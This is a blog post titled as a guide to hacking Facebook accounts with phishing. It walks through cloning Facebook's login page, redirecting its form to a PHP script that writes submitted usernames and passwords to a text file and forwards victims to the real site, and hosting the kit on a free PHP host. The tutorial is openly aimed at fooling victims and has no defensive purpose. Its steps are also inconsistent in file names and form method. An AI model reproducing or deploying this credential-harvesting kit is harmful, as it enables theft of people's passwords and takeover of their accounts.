Saturday, April 05, 2014

HOW TO HACK FACEBOOK ACCOUNTS WITH PHISHING [UPDATED]

HOW TO HACK FACEBOOK ACCOUNTS WITH PHISHING [UPDATED]



Hello Friends , This is my third post on Phishing. In the Last two posts I told yo about "how to hack Gmail and Facebook accounts with phishing".

Today Also I'll Tell you about Facebook account hacking with Phishing. This is a Updated Hacking Trick for My Last Two Phishing Posts.

Note:- The PHP file which was not working , now has been replaced with a updated one. 

So Viewers Lets Begin.....


Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.




THINGS YOU WILL NEED:-


You need 3 files 


  1. Index.html
  2. phish.php
  3. passwords.txt     
to create a fake facebook login page.






STEPS


  • To create index.html :

  1. First of all open http://www.facebook.com/ in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu.
  2. Once done you will have a file named “index.html” and a folder named “index_files”.
  3. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad.
  4. From edit menu select find, type action in it and locate following string
action="https://www.facebook.com/login.php?login_attempt=1"


    5. Now replace this string with action= “pass.php” and also change the method in html from 'post' to 'get'.

    6. Save the document.


  • To create phish.php :
  1. Open notepad type or copy the following php code in it.

<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

NOW SAVE THE FILE AS " pass.php " 





  • To create passwords.txt :


Simply create text document and rename it as passwords.txt






UPLOADING THE FILES 

Now you'll need a free web hosting service that supports PHP. 

I suggest you to use http://www.1freehosting.com/  or cpanel.1freehosting.com




  1. Open the site and create an account. Once you have created your account, you login to your account 
  2. Now Go to Hosting Tab and Create a Domain of your Phishing page there .
  3. When your account get active ,Click on Switch Button
  4. Now Scroll Down and You will find File Manager , Click on It 
Now your File Manager Will Get Installed and will be opened , Now Uploading all the Three Files there and Close the File manager.


THATS IT .... CONGRATULATIONS YOU HAVE JUST NOW CREATED A PHISHING PAGE 











Tags: , , , , ,

0 Responses to “HOW TO HACK FACEBOOK ACCOUNTS WITH PHISHING [UPDATED]”

Subscribe

Donec sed odio dui. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio. Duis mollis

© 2013 Old is Gold. All rights reserved.
Designed by SpicyTricks